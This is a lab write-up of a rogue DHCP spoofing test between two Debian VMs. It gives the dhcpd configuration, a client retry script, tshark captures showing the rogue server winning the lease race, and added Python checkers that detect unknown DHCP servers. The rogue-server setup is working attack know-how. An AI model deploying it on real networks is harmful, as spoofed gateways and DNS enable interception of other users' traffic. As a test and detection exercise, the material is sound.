Prepare two virtual machines, both running Debian 7.
On one of them set up a DHCP server to act as the rogue (spoofed) DHCP server; the other acts as the client and requests an IP address via DHCP.
If everything works as expected, the rogue DHCP server will hand the client VM an IP address, which is the spoofing outcome we want to demonstrate.
Prerequisite: the CIDR, IP address range, netmask, DNS servers and so on must be looked up beforehand, because the DHCP server below is configured from them.
Start the test
First, the VM that will impersonate the DHCP server
VM1: IP address 10.180.163.200/28
Set up the DHCP server on this VM
Install:
apt-get install isc-dhcp-server
Configure the DHCP server. The listening interface goes in /etc/default/isc-dhcp-server, not inside the subnet block (dhcpd would refuse to parse it there):
INTERFACES="eth1"
The subnet itself goes in /etc/dhcp/dhcpd.conf:
subnet 10.180.163.192 netmask 255.255.255.240 {
  range 10.180.163.201 10.180.163.203;
  option domain-name-servers 10.180.156.5;
  option routers 10.180.160.1;
  option subnet-mask 255.255.255.240;
  option broadcast-address 10.180.163.255;  # note: the broadcast address of 10.180.163.192/28 is actually 10.180.163.207
}
Where:
INTERFACES: the NIC dhcpd listens on
range: the range of IP addresses the rogue DHCP server will hand out to clients
domain-name-servers: DNS servers
routers: gateway
subnet-mask: netmask
broadcast-address: broadcast address
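As a consistency check on the subnet block above (an added example, not part of the original write-up and not an isc-dhcp-server tool): a small Python script that parses the subnet declaration and verifies that the range, subnet-mask, broadcast-address and routers options agree with the subnet/netmask pair. The subnet text is copied from the configuration above; the checker and its messages are this example's own. Run against this configuration it reports that the broadcast address of 10.180.163.192/28 is 10.180.163.207 rather than 10.180.163.255, and that the router 10.180.160.1 lies outside the /28 (the real server's lease shown later on this page carries classless static routes that make that gateway reachable, so in this lab that finding is informational).

```python
import ipaddress
import re

# The subnet block from the write-up above, copied as-is (dhcpd.conf syntax).
DHCPD_SUBNET = """
subnet 10.180.163.192 netmask 255.255.255.240 {
  range 10.180.163.201 10.180.163.203;
  option domain-name-servers 10.180.156.5;
  option routers 10.180.160.1;
  option subnet-mask 255.255.255.240;
  option broadcast-address 10.180.163.255;
}
"""


def parse_subnet(text):
    """Extract subnet, netmask, range and the options we check from one subnet block."""
    m = re.search(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{", text)
    if not m:
        raise ValueError("no subnet declaration found")
    cfg = {"subnet": m.group(1), "netmask": m.group(2)}
    r = re.search(r"\brange\s+(\S+)\s+(\S+)\s*;", text)
    if r:
        cfg["range"] = (r.group(1), r.group(2))
    for opt in ("routers", "subnet-mask", "broadcast-address"):
        o = re.search(r"option\s+%s\s+([^;]+);" % re.escape(opt), text)
        if o:
            cfg[opt] = o.group(1).strip()
    return cfg


def check_subnet(cfg):
    """Return a list of human-readable findings; an empty list means the block is consistent."""
    net = ipaddress.ip_network("%s/%s" % (cfg["subnet"], cfg["netmask"]), strict=True)
    findings = []
    if "range" in cfg:
        lo, hi = (ipaddress.ip_address(a) for a in cfg["range"])
        if lo > hi:
            findings.append("range start %s is above range end %s" % (lo, hi))
        for a in (lo, hi):
            # the network and broadcast addresses are never valid lease addresses
            if a not in net or a in (net.network_address, net.broadcast_address):
                findings.append("range address %s is not a usable host in %s" % (a, net))
    if "subnet-mask" in cfg and cfg["subnet-mask"] != str(net.netmask):
        findings.append("option subnet-mask %s differs from netmask %s"
                        % (cfg["subnet-mask"], net.netmask))
    if "broadcast-address" in cfg:
        bcast = ipaddress.ip_address(cfg["broadcast-address"])
        if bcast != net.broadcast_address:
            findings.append("option broadcast-address %s should be %s for %s"
                            % (bcast, net.broadcast_address, net))
    if "routers" in cfg:
        gw = ipaddress.ip_address(cfg["routers"])
        if gw not in net:
            findings.append("option routers %s is not inside %s" % (gw, net))
    return findings


if __name__ == "__main__":
    for finding in check_subnet(parse_subnet(DHCPD_SUBNET)):
        print("finding:", finding)
```

The same check is worth running on a legitimate server's configuration, since a mismatched broadcast address or an out-of-subnet gateway in a lease is one of the cheap things a client-side audit can spot.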
Restart the service
service isc-dhcp-server restart
Check the status
# service isc-dhcp-server status
Status of ISC DHCP server: dhcpd is running.
That's the rogue DHCP server set up.
Next, prepare the VM that will send the DHCP requests
VM2: IP address 10.180.163.199/28
Given the IP range configured on VM1's DHCP server, VM2 should end up with an IP in 201~203
One thing to note first: some details of the VM we created have already been recorded
VM2:
# cat /var/lib/dhcp/dhclient.eth1.leases
lease {
  interface "eth1";
  fixed-address 10.180.163.199;
  option subnet-mask 255.255.255.240;
  option dhcp-lease-time 86400;
  option dhcp-message-type 5;
  option dhcp-server-identifier 10.180.163.196;
  option domain-search ;
  option dhcp-renewal-time 43200;
  option rfc3442-classless-static-routes 22,10,180,160,0,0,0,0,8,10,10,180,160,1,23,10,180,10,10,180,160,1,23,10,180,8,10,180,160,1,12,172,16,10,180,160,1,16,192,168,10,180,160,1;
  option broadcast-address 10.180.163.207;
  option dhcp-rebinding-time 75600;
  option host-name "host-10-180-163-199";
  renew 4 2015/10/15 19:53:11;
  rebind 5 2015/10/16 07:41:12;
  expire 5 2015/10/16 10:41:12;
}
As you can see, what is recorded is the IP address the network really assigned when the VM was created, 199, together with the identifier of the server that issued it (10.180.163.196)
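The lease file is also the quickest place on a host to answer "which server did my address actually come from?". As an added example (not part of the original write-up): a Python parser for dhclient's lease file format that lists every recorded lease and flags any whose dhcp-server-identifier is not in an allowlist. The first record is the one shown above; the second is a constructed record of the kind dhclient appends to the same file once a different server's ACK has been accepted, and the allowlist of legitimate servers is an assumption for this lab.

```python
import re

# Constructed sample: the record shown above, followed by a hypothetical second
# record as dhclient would append it after accepting an ACK from 10.180.163.200.
LEASES = """
lease {
  interface "eth1";
  fixed-address 10.180.163.199;
  option subnet-mask 255.255.255.240;
  option dhcp-lease-time 86400;
  option dhcp-message-type 5;
  option dhcp-server-identifier 10.180.163.196;
  option domain-search ;
  option dhcp-renewal-time 43200;
  option rfc3442-classless-static-routes 22,10,180,160,0,0,0,0,8,10,10,180,160,1,23,10,180,10,10,180,160,1,23,10,180,8,10,180,160,1,12,172,16,10,180,160,1,16,192,168,10,180,160,1;
  option broadcast-address 10.180.163.207;
  option dhcp-rebinding-time 75600;
  option host-name "host-10-180-163-199";
  renew 4 2015/10/15 19:53:11;
  rebind 5 2015/10/16 07:41:12;
  expire 5 2015/10/16 10:41:12;
}
lease {
  interface "eth1";
  fixed-address 10.180.163.203;
  option subnet-mask 255.255.255.240;
  option dhcp-lease-time 600;
  option dhcp-message-type 5;
  option dhcp-server-identifier 10.180.163.200;
  option broadcast-address 10.180.163.255;
  renew 4 2015/10/15 19:30:05;
  rebind 4 2015/10/15 19:33:45;
  expire 4 2015/10/15 19:35:05;
}
"""

# Assumed allowlist: the servers that are supposed to serve this segment.
KNOWN_SERVERS = {"10.180.163.196", "10.180.163.195"}


def parse_leases(text):
    """Return one dict per 'lease { ... }' block, in file order (last one is the newest)."""
    leases = []
    for body in re.findall(r"lease\s*\{(.*?)\}", text, re.S):
        rec = {}
        for stmt in body.split(";"):
            parts = stmt.split()
            if not parts:
                continue
            if parts[0] == "option" and len(parts) >= 2:
                # 'option NAME VALUE...' ; VALUE may be empty (e.g. domain-search)
                rec[parts[1]] = " ".join(parts[2:])
            elif len(parts) >= 2:
                # 'fixed-address X', 'interface "eth1"', 'expire W YYYY/MM/DD HH:MM:SS'
                rec[parts[0]] = " ".join(parts[1:])
        leases.append(rec)
    return leases


def audit_leases(text, known_servers):
    """Return (fixed-address, server-identifier, expire) for every lease from an unknown server."""
    alerts = []
    for rec in parse_leases(text):
        server = rec.get("dhcp-server-identifier")
        if server not in known_servers:
            alerts.append((rec.get("fixed-address"), server, rec.get("expire")))
    return alerts


if __name__ == "__main__":
    for addr, server, expire in audit_leases(LEASES, KNOWN_SERVERS):
        print("lease for %s came from unknown server %s (expires %s)" % (addr, server, expire))
```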
So, before sending a dhclient request, this file has to be emptied first
echo '' > /var/lib/dhcp/dhclient.eth1.leases
Then clear the IP address from the eth1 interface
ifconfig eth1 0
Finally, VM2 sends the DHCP request
dhclient -v eth1 -lf /var/lib/dhcp/dhclient.eth1.leases
Written as a shell script:
#!/bin/bash
# usage: ./dhclient.sh eth1
NIC="$1"
# wipe the recorded lease so dhclient does not just ask to renew the old address
echo '' > "/var/lib/dhcp/dhclient.$NIC.leases"
# drop the interface's current address
ifconfig "$NIC" 0
# send a fresh, verbose DHCP request using the emptied lease file
dhclient -v "$NIC" -lf "/var/lib/dhcp/dhclient.$NIC.leases"
Run it with eth1 as the argument. The reason for putting this in a script is that in this test scenario the rogue DHCP server (VM1) does not manage to assign VM2 an address in 201~203 every time. Normally the requesting host takes its address according to the order in which the DHCP responses arrive, or more precisely the order in which an assignment completes successfully. In other words, if the real DHCP server responds first and completes the assignment of 199, the rogue server's assignment of 201~203 cannot complete; only when the rogue DHCP server completes its assignment first is VM2 actually spoofed.
Below, the exchange is analyzed with packet captures, using tshark, Wireshark's command-line tool
VM2: send the DHCP request
# dhclient -v eth1 -lf /var/lib/dhcp/dhclient.eth1.leases
Internet Systems Consortium DHCP Client 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth1/fa:16:3e:ab:1d:c3
Sending on   LPF/eth1/fa:16:3e:ab:1d:c3
Sending on   Socket/fallback
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 5
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPOFFER from 10.180.163.196
DHCPACK from 10.180.163.196
bound to 10.180.163.199 -- renewal in 34476 seconds.
It looks like 199 was assigned again; no sign of spoofing
VM1: the rogue DHCP server does receive the request
tshark -i eth1 -R "udp.port == 67"
tshark: Lua: Error during loading:
[string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled
Running as user "root" and group "root". This could be dangerous.
Capturing on eth1
117.261618 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0xd8b82b19
117.262926 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0xd8b82b19
VM1: the requesting host
~# tshark -i eth1 -R "udp.port == 67"
tshark: Lua: Error during loading:
[string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled
Running as user "root" and group "root". This could be dangerous.
Capturing on eth1
36.233466 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0xd8b82b19
36.234861 10.180.163.196 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0xd8b82b19
36.234957 10.180.163.195 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0xd8b82b19
36.235035 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0xd8b82b19
36.235537 10.180.163.196 -> 10.180.163.199 DHCP 391 DHCP ACK - Transaction ID 0xd8b82b19
We do see an ACK, but it comes from the real DHCP server, 196, not from the rogue DHCP server I set up (200)
So at this point, just send a few more requests, since the whole purpose of the test is to get the rogue DHCP server (VM1) to spoof the client host (VM2)
VM2: keep sending requests; this time it looks like it succeeded
~# ./dhclient.sh eth1
Internet Systems Consortium DHCP Client 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth1/fa:16:3e:ab:1d:c3
Sending on LPF/eth1/fa:16:3e:ab:1d:c3
Sending on Socket/fallback
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 7
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPOFFER from 10.180.163.200
DHCPACK from 10.180.163.200
bound to 10.180.163.203 -- renewal in 242 seconds.
From this output, an ACK from 200 was received and IP address 203 was assigned
VM2: look at the DHCP packets
~# tshark -i eth1 -R "udp.port == 67"
tshark: Lua: Error during loading:
[string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled
Running as user "root" and group "root". This could be dangerous.
Capturing on eth1
6.987536 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0x97a3b630
6.987813 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP Offer - Transaction ID 0x97a3b630
6.988263 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0x97a3b630
6.989307 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP ACK - Transaction ID 0x97a3b630
The full discover, offer, request and ack sequence is visible
VM1: look at the client host
~# tshark -i eth1 -R "udp.port == 67"
tshark: Lua: Error during loading:
[string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled
Running as user "root" and group "root". This could be dangerous.
Capturing on eth1
9.471834 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0x97a3b630
9.472527 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP Offer - Transaction ID 0x97a3b630
9.472750 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0x97a3b630
9.472944 10.180.163.196 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0x97a3b630
9.473153 10.180.163.195 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0x97a3b630
9.473897 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP ACK - Transaction ID 0x97a3b630
Seeing this, we can be fully confident that IP address 203 was assigned; check on the client
~# ifconfig eth1
eth1      Link encap:Ethernet  HWaddr fa:16:3e:ab:1d:c3
          inet addr:10.180.163.203  Bcast:10.180.163.255  Mask:255.255.255.240
          inet6 addr: fe80::f816:3eff:feab:1dc3/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:790 errors:0 dropped:0 overruns:0 frame:0
          TX packets:515 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:96388 (94.1 KiB)  TX bytes:162776 (158.9 KiB)
So here we see that the host whose IP address was originally 199 was forced by the DHCP server I built (200) to take an IP address it should never have had, 203 (from the 201~203 range)
Even more interesting: even if the spoofed VM2 is rebooted, after a few tries it can still end up with IP address 203 from the rogue DHCP server
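The captures above contain everything needed to spot a rogue server from the wire. As an added example (not part of the original write-up, and not a Wireshark tool): a Python script that parses tshark summary lines in the format shown, groups messages by transaction ID, and reports every transaction in which an OFFER or ACK came from a server outside an assumed allowlist of legitimate servers (10.180.163.196 and 10.180.163.195 here). The sample lines are the two captures reproduced from this page. The report also records whose OFFER arrived first, which is what decides the race described earlier: in 0x97a3b630 the rogue server's OFFER landed before the real ones, the client's REQUEST went out right after it, and the rogue server's ACK is the one the client bound to.

```python
import re
from collections import defaultdict

# Constructed sample input: the two tshark captures reproduced from this page,
# one where the real server (196) won and one where the rogue server (200) won.
CAPTURE = """\
36.233466 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0xd8b82b19
36.234861 10.180.163.196 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0xd8b82b19
36.234957 10.180.163.195 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0xd8b82b19
36.235035 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0xd8b82b19
36.235537 10.180.163.196 -> 10.180.163.199 DHCP 391 DHCP ACK - Transaction ID 0xd8b82b19
9.471834 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0x97a3b630
9.472527 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP Offer - Transaction ID 0x97a3b630
9.472750 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0x97a3b630
9.472944 10.180.163.196 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0x97a3b630
9.473153 10.180.163.195 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0x97a3b630
9.473897 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP ACK - Transaction ID 0x97a3b630
"""

# Assumed allowlist: the servers that are supposed to serve this segment.
KNOWN_SERVERS = {"10.180.163.196", "10.180.163.195"}

# One tshark summary line in the format shown in the captures above.
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s+DHCP\s+\d+\s+"
    r"DHCP\s+(?P<type>Discover|Offer|Request|ACK|NAK)\s+-\s+"
    r"Transaction ID\s+(?P<xid>0x[0-9a-fA-F]+)$"
)


def parse_capture(text):
    """Turn tshark summary lines into dicts; lines that do not match (e.g. banners) are skipped."""
    msgs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["ts"] = float(d["ts"])
            msgs.append(d)
    return msgs


def find_rogue_servers(text, known_servers):
    """Report every DHCP transaction that involved a server outside the allowlist.

    Each report names the unknown servers, says whose OFFER arrived first,
    and whether an unknown server's ACK is the one the client ended up with.
    """
    by_xid = defaultdict(list)
    for m in parse_capture(text):
        by_xid[m["xid"]].append(m)

    report = []
    for xid, msgs in by_xid.items():
        msgs.sort(key=lambda m: m["ts"])
        offers = [m for m in msgs if m["type"] == "Offer"]
        acks = [m for m in msgs if m["type"] == "ACK"]
        unknown = sorted({m["src"] for m in offers + acks} - known_servers)
        if not unknown:
            continue
        final_ack = acks[-1] if acks else None
        won = final_ack is not None and final_ack["src"] in unknown
        report.append({
            "xid": xid,
            "rogue_servers": unknown,
            "first_offer": offers[0]["src"] if offers else None,
            "won": won,
            # tshark shows the offered address (yiaddr) as the IP destination of the ACK
            "leased": final_ack["dst"] if won else None,
        })
    return report


if __name__ == "__main__":
    for r in find_rogue_servers(CAPTURE, KNOWN_SERVERS):
        print(r)
```

Fed live output from `tshark -i eth1 -R "udp.port == 67"` on a monitoring host, the same logic turns into a simple rogue-DHCP alert: any OFFER or ACK whose source is not on the allowlist is worth a ticket even when the legitimate server still wins the race, because the next transaction may go the other way, exactly as the two captures above show.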
root@test-spoofing-1:~# reboot
The system is going down for reboot NOW!t-spoofing-1 (pts/1) (Thu Oct 15 19:2
root@test-spoofing-1:~# Connection to 10.180.156.10 closed by remote host.
Connection to 10.180.156.10 closed.
~/server on master! ⌚ 19:23:05 $ ssh -i dev.private root@10.180.156.10
Linux test-spoofing-1 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Oct 15 19:23:47 2015 from 10.180.158.2
root@test-spoofing-1:~# ifconfig eth1
eth1      Link encap:Ethernet  HWaddr fa:16:3e:ab:1d:c3
          inet addr:10.180.163.203  Bcast:10.180.163.255  Mask:255.255.255.240
          inet6 addr: fe80::f816:3eff:feab:1dc3/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:49 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4136 (4.0 KiB)  TX bytes:1172 (1.1 KiB)